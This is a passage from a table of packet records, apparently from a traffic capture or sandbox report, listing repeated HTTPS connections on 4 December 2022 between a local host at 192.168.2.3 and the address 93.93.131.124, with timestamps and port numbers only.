| Dec 4, 2022 12:07:43.252414942 CET | 443 | 49718 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.292623997 CET | 443 | 49718 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.292730093 CET | 443 | 49718 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.292793989 CET | 49718 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.293438911 CET | 49718 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.294887066 CET | 49719 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.294953108 CET | 443 | 49719 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.295131922 CET | 49719 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.295335054 CET | 49719 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.295351982 CET | 443 | 49719 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.397505045 CET | 443 | 49719 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.402301073 CET | 49719 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.402349949 CET | 443 | 49719 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.464426041 CET | 443 | 49719 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.464505911 CET | 443 | 49719 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.464618921 CET | 49719 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.464657068 CET | 443 | 49719 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.467437029 CET | 49719 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.291562080 CET | 49720 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.291634083 CET | 443 | 49720 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.291754007 CET | 49720 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.308963060 CET | 49720 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.309005976 CET | 443 | 49720 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.444722891 CET | 443 | 49720 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.444889069 CET | 49720 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.448210955 CET | 49720 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.448250055 CET | 443 | 49720 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.448748112 CET | 443 | 49720 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.477282047 CET | 49720 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.477319956 CET | 443 | 49720 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.511986017 CET | 443 | 49720 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.512150049 CET | 443 | 49720 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.512271881 CET | 49720 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.512976885 CET | 49720 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.514256954 CET | 49721 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.514312983 CET | 443 | 49721 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.514516115 CET | 49721 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.514710903 CET | 49721 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.514738083 CET | 443 | 49721 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.622351885 CET | 443 | 49721 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.624650002 CET | 49721 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.624686003 CET | 443 | 49721 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.687275887 CET | 443 | 49721 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.687369108 CET | 443 | 49721 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.687510014 CET | 49721 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:01.687541008 CET | 443 | 49721 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.696111917 CET | 49721 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.017808914 CET | 49722 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.017874002 CET | 443 | 49722 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.017971039 CET | 49722 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.030087948 CET | 49722 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.030132055 CET | 443 | 49722 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.141810894 CET | 443 | 49722 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.142040968 CET | 49722 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.148114920 CET | 49722 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.148153067 CET | 443 | 49722 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.148823977 CET | 443 | 49722 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.179917097 CET | 49722 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.179954052 CET | 443 | 49722 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.215545893 CET | 443 | 49722 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.215704918 CET | 443 | 49722 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.215818882 CET | 49722 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.216391087 CET | 49722 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.220115900 CET | 49723 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.220161915 CET | 443 | 49723 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.220295906 CET | 49723 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.220614910 CET | 49723 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.220645905 CET | 443 | 49723 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.330782890 CET | 443 | 49723 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.335462093 CET | 49723 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.335541964 CET | 443 | 49723 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.397104025 CET | 443 | 49723 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.397207975 CET | 443 | 49723 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.397449970 CET | 49723 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:21.397502899 CET | 443 | 49723 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:21.399478912 CET | 49723 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:46.860394955 CET | 49724 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:46.860454082 CET | 443 | 49724 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:46.860536098 CET | 49724 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:46.870367050 CET | 49724 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:46.870397091 CET | 443 | 49724 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:46.973371029 CET | 443 | 49724 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:46.973609924 CET | 49724 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:46.980412006 CET | 49724 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:46.980441093 CET | 443 | 49724 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:46.980886936 CET | 443 | 49724 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:47.009294033 CET | 49724 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:47.009378910 CET | 443 | 49724 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:47.044398069 CET | 443 | 49724 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:47.044500113 CET | 443 | 49724 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:47.044574976 CET | 49724 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:47.045290947 CET | 49724 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:47.046319962 CET | 49725 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:47.046370029 CET | 443 | 49725 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:47.046484947 CET | 49725 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:47.046818972 CET | 49725 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:47.046840906 CET | 443 | 49725 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:47.149161100 CET | 443 | 49725 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:47.163711071 CET | 49725 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:47.163748026 CET | 443 | 49725 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:47.216839075 CET | 443 | 49725 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:47.216907024 CET | 443 | 49725 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:47.217066050 CET | 49725 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:08:47.217107058 CET | 443 | 49725 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:08:47.221688032 CET | 49725 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.482678890 CET | 49726 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.482757092 CET | 443 | 49726 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.482847929 CET | 49726 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.513396025 CET | 49726 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.513511896 CET | 443 | 49726 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.622198105 CET | 443 | 49726 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.622407913 CET | 49726 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.647605896 CET | 49726 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.647680998 CET | 443 | 49726 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.648387909 CET | 443 | 49726 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.668029070 CET | 49726 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.668090105 CET | 443 | 49726 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.703429937 CET | 443 | 49726 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.703576088 CET | 443 | 49726 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.703766108 CET | 49726 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.704360008 CET | 49726 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.705665112 CET | 49727 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.705750942 CET | 443 | 49727 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.705861092 CET | 49727 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.706156969 CET | 49727 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.706216097 CET | 443 | 49727 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.815757036 CET | 443 | 49727 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.818062067 CET | 49727 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.818113089 CET | 443 | 49727 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.882106066 CET | 443 | 49727 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.882164955 CET | 443 | 49727 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.882255077 CET | 49727 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:16.882302999 CET | 443 | 49727 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.884222031 CET | 49727 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.270452023 CET | 49728 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.270548105 CET | 443 | 49728 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.270703077 CET | 49728 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.289896011 CET | 49728 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.289963007 CET | 443 | 49728 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.380218029 CET | 443 | 49728 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.380528927 CET | 49728 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.388437986 CET | 49728 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.388479948 CET | 443 | 49728 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.389106035 CET | 443 | 49728 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.409310102 CET | 49728 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.409363031 CET | 443 | 49728 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.444109917 CET | 443 | 49728 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.444277048 CET | 443 | 49728 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.444396973 CET | 49728 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.445239067 CET | 49728 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.446679115 CET | 49729 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.446744919 CET | 443 | 49729 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.446837902 CET | 49729 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.447791100 CET | 49729 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.447828054 CET | 443 | 49729 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.536407948 CET | 443 | 49729 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.538598061 CET | 49729 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.538630962 CET | 443 | 49729 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.602576971 CET | 443 | 49729 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.602663994 CET | 443 | 49729 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.602906942 CET | 49729 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:09:40.602958918 CET | 443 | 49729 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.610270023 CET | 49729 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.524262905 CET | 49730 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.524337053 CET | 443 | 49730 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.524441004 CET | 49730 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.581121922 CET | 49730 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.581190109 CET | 443 | 49730 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.680455923 CET | 443 | 49730 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.680672884 CET | 49730 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.693941116 CET | 49730 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.693979979 CET | 443 | 49730 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.694740057 CET | 443 | 49730 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.717490911 CET | 49730 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.717534065 CET | 443 | 49730 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.752229929 CET | 443 | 49730 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.752397060 CET | 443 | 49730 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.752763987 CET | 49730 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.753151894 CET | 49730 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.754748106 CET | 49731 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.754816055 CET | 443 | 49731 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.754955053 CET | 49731 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.755918980 CET | 49731 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.755964994 CET | 443 | 49731 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.853256941 CET | 443 | 49731 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.858509064 CET | 49731 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.858546972 CET | 443 | 49731 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.920969963 CET | 443 | 49731 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.921065092 CET | 443 | 49731 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.921206951 CET | 49731 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:11.921247959 CET | 443 | 49731 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.924679995 CET | 49731 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.719149113 CET | 49732 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.719229937 CET | 443 | 49732 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:38.719367027 CET | 49732 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.730812073 CET | 49732 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.730899096 CET | 443 | 49732 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:38.844542027 CET | 443 | 49732 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:38.844805002 CET | 49732 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.847074032 CET | 49732 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.847110987 CET | 443 | 49732 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:38.847800970 CET | 443 | 49732 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:38.879853964 CET | 49732 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.879911900 CET | 443 | 49732 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:38.915083885 CET | 443 | 49732 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:38.915246964 CET | 443 | 49732 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:38.915433884 CET | 49732 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.916109085 CET | 49732 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.917186975 CET | 49733 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.917228937 CET | 443 | 49733 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:38.917315006 CET | 49733 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.917656898 CET | 49733 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:38.917678118 CET | 443 | 49733 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:39.012691975 CET | 443 | 49733 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:39.014930964 CET | 49733 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:39.014957905 CET | 443 | 49733 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:39.077752113 CET | 443 | 49733 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:39.077841043 CET | 443 | 49733 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:39.078068018 CET | 49733 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:10:39.078116894 CET | 443 | 49733 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:10:39.087322950 CET | 49733 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.323820114 CET | 49738 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.323904991 CET | 443 | 49738 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.324008942 CET | 49738 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.333448887 CET | 49738 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.333499908 CET | 443 | 49738 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.425997019 CET | 443 | 49738 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.426268101 CET | 49738 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.438740015 CET | 49738 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.438779116 CET | 443 | 49738 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.439609051 CET | 443 | 49738 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.461440086 CET | 49738 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.461503029 CET | 443 | 49738 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.496895075 CET | 443 | 49738 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.497045994 CET | 443 | 49738 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.497186899 CET | 49738 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.503395081 CET | 49738 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.507756948 CET | 49739 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.507828951 CET | 443 | 49739 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.507950068 CET | 49739 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.508399010 CET | 49739 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.508433104 CET | 443 | 49739 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.615255117 CET | 443 | 49739 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.617542982 CET | 49739 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.617575884 CET | 443 | 49739 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.684376001 CET | 443 | 49739 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.684470892 CET | 443 | 49739 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.684600115 CET | 49739 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:11.684662104 CET | 443 | 49739 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.686927080 CET | 49739 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:46.856956959 CET | 49750 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:46.857026100 CET | 443 | 49750 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:46.857106924 CET | 49750 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:46.885355949 CET | 49750 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:46.885391951 CET | 443 | 49750 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:46.997651100 CET | 443 | 49750 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:46.997854948 CET | 49750 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.001543045 CET | 49750 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.001590014 CET | 443 | 49750 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.002283096 CET | 443 | 49750 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.024622917 CET | 49750 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.024689913 CET | 443 | 49750 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.060895920 CET | 443 | 49750 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.061021090 CET | 443 | 49750 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.061125994 CET | 49750 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.062027931 CET | 49750 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.063456059 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.063507080 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.063651085 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.064057112 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.064070940 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.169594049 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.262368917 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.262413025 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.298743963 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.298837900 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.298855066 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
